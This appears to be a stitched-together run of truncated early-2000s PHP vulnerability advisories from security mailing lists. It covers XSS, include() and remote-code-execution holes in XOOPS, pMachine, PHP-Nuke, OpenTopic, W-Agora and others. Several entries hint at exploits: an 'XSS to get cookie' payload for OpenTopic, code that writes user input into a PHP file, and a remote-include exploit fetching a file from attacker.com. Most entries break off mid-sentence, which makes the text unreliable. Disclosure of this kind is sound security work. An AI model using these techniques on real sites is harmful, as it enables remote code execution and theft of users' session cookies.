Informations :
°
Language : PHP
Bugged Versions : 1.3.x and less (+ 2.0.x and less ? not checked)
Safe Version : 2.0.3
Website : http://www.xoops.org
Problem : BBcode XSS
PHP Code/Location :
°°°
This hole can be used in modules :
- Private Messages
- News
- NewBB (forum)
Informations :
°
Language : PHP
Version : Free 2.2.1
Website : http://www.pmachine.com
Problem : Include() Security Hole
PHP Code/Location :
°°°
This will work if register_globals is ON *OR* OFF.
/pm/lib.inc.php :
-
Here is a new list of security patchs for some security holes in PHP
products (by phpSecure team & others).
The most of the security holes have been published on securityfocus
(vuln-dev or bugtraq).
- SPGpartenaires 3.0.1 :
http://www.phpsecure.org/index.php?id=65&zone=pDl
More details :
h
Informations :
°°
Version : 0.86-dev
Website : http://www.wihsy.com
problem : All files from the hard disk can be send by mail
PHP Code/Location :
°°°
util/email.php :
function CMailFile($subject,
Informations :
°°
Version : 0.4.3-1
Website : http://myphppagetool.sourceforge.net/
Problem : Include file
PHP Code/Location :
°°°
In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php,
help4.php, help5.php, help6.php, help7.php, help8.php and help9
A non-official patch has been created for this hole and is published on
http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (english
version) .
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: dotproject Remote Code Execution Vulnerability
Date: Wed, 29 Jan 2003 04:02:24 -080
A patch has been created for this hole and can be found on
http://www.phpsecure.org/.
From: MGhz <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Zorum Portal (PHP)
Date: 22 Jan 2003 19:45:26 -
Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file
Informations :
°°
Product : OpenTopic
Website : http://www.infopop.com
Version : 2.3.1
Problem : XSS (script injection) -> Cookies recovery
Location/Exploit :
°°
The XSS hole is in the private messages area (
http://[target]/OpenTopic?a=ugtpc ).
XSS to get cookie :
[I
PHPSecure made some patchs for security holes in PHP products.
Here is the list :
- ALP - Banner Ad 2.0 :
http://www.phpsecure.org/index.php?id=1&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=ALP
- Tight Auction 3.0 :
http://www.phpsecure.org/index.php?id=6&zon
Informations :
°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS
Developpement :
°°°
The majority of the PHPNuke's files are includes in modules.php or
index.php. To prevent the direct access, PHPNuke made two kinds o
Informations :
°°
Language : PHP
Tested version : 1
Problem : bad use of include()
PHP Code :
°°
---Include/variables.php3---
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage="2000";
$MoisDeDemarrage="8";
$NbNouvelles=5;
require("$Include/frenc
Informations :
°°
Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.
a) Writing PHP code in a PHP file and execution of this code.
Problem :
°
- users.php -
");
fwrite($fp,"$MESS\n");
fclose($fp);
?>
- u
I sent this three times to webappsec but without resultats.
I try so on bugtraq, although that is less appropriate.
-
Five products in PHP are vulnerable to various holes.
1) TightAuction
Website : http://www.tightprices.com
Tested Version : 3
Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do
it :) I just hope that doesn't give more work to the webmasters.
Product 1 :
***
W-Agora 4.1.3
http://www.w-agora.net
Problem :
- Including file
Exploits :
- With a file http://www.attacker.com/dbaccess.txt :